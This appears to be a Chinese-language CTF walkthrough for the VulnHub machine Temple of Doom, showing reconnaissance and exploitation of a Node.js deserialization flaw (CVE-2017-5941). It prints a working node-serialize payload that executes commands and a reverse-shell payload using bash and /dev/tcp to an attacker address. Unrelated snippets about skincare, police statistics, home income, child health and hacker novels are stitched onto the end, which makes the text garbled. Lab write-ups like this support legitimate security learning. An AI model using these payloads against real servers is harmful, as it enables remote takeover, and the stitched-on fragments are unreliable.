靶机地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/
靶机难度:中级(CTF)
靶机发布日期:2018年6月8日
靶机描述:
由https://twitter.com/0katz创建的CTF
]难度:简单/中级
在VirtualBox中测试
注意:2种扎根 ***
目标:得到root权限&找到flag.txt
作者:DXR嗯嗯呐
nmap扫描IP
nmap端口扫描
22 ssh
666 Express 是一个保持最小规模的灵活的 Node.js Web 应用程序开发框架,为 Web 和移动应用程序提供一组强大的功能。
访问80端口
没有获得有用的信息,使用dirb,nikto扫描,结果也没发现什么
不知道怎么办了,使用burpsuite抓一下包看看吧
看到了cookie的值可能是一个base64编码
界面获得一个json字符串感觉格式不完整,修改一下
解码后
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMTIn0%3D
修改后
重新编码提交,获得一个界面
加上cookie使用dirb扫描依然失败,看了看老人们的,发现这里是考Node.js反序列化远程代码执行(CVE-2017-5941)这个漏洞
大佬写的很具体
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('whoami',(error,stdout,stderr)=>{console.log(stdout)}); }()"}
编译后
eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ3dob2FtaScsKGU *** 3V0LGVycik9Pntjb25zb2xlLmxvZyhvdXQpO30pOyB9KCkifQo=
获得用户名 nodeadmin
直接使用bash获得反弹shell
{"username":"_$$ND_FUNC$$_function(){return require('child_process').execSync('bash -i >& /dev/tcp/192.168.56.3/5555 0>&1',(error,stdout,stderr)=>{console.log(stdout)}); }()"}
口碑最好的国产护肤品?盘点国货护肤品中的那些经典产品之二 五、相宜本草经典产品 1、相宜本草四倍蚕丝凝亮套装:首先是洁面膏:出膏口处有锡纸封闭,即卫生,又防止膏体外溢,膏体洁白泡沫丰富细腻,洗...
12月14日,浙江省公安厅召开新闻发布会通报“净网2018专项行动”以来的相关成果。 从通报会获悉,截至目前,全省公安机关共侦破各类涉网刑事案件5139起,抓获犯罪嫌疑人20040人;清理违法有害信息...
伴随着互联网的迅速发展趋势,创业商机经常可以看到。在这类情况下,很多己婚全职的家庭妇女不会再达到于照料亲人,也逐渐方案找一些项目赚钱。那麼,结了婚的女人做什么挣钱呢?2018年怎样在家挣钱?我们一...
宝宝春季很容易就呼吸道感染了,那么孩子呼吸道感染怎么做,如何预防孩子呼吸道方面的疾病呢,孩子呼吸道疾病预防方法。 如何预防孩子呼吸道疾病 首先,家长要知道,呼吸道感染分为上呼吸道感染和下呼吸道感染...
本文目录一览: 1、黑客类的小说 2、求几本黑客类的小说 3、谁推荐几本关于黑客的小说,主要内容要带点计算机知识的,类似于《黑客传说》,《我是一个黑客》 黑客类的小说 重生之黑而不死而为神力...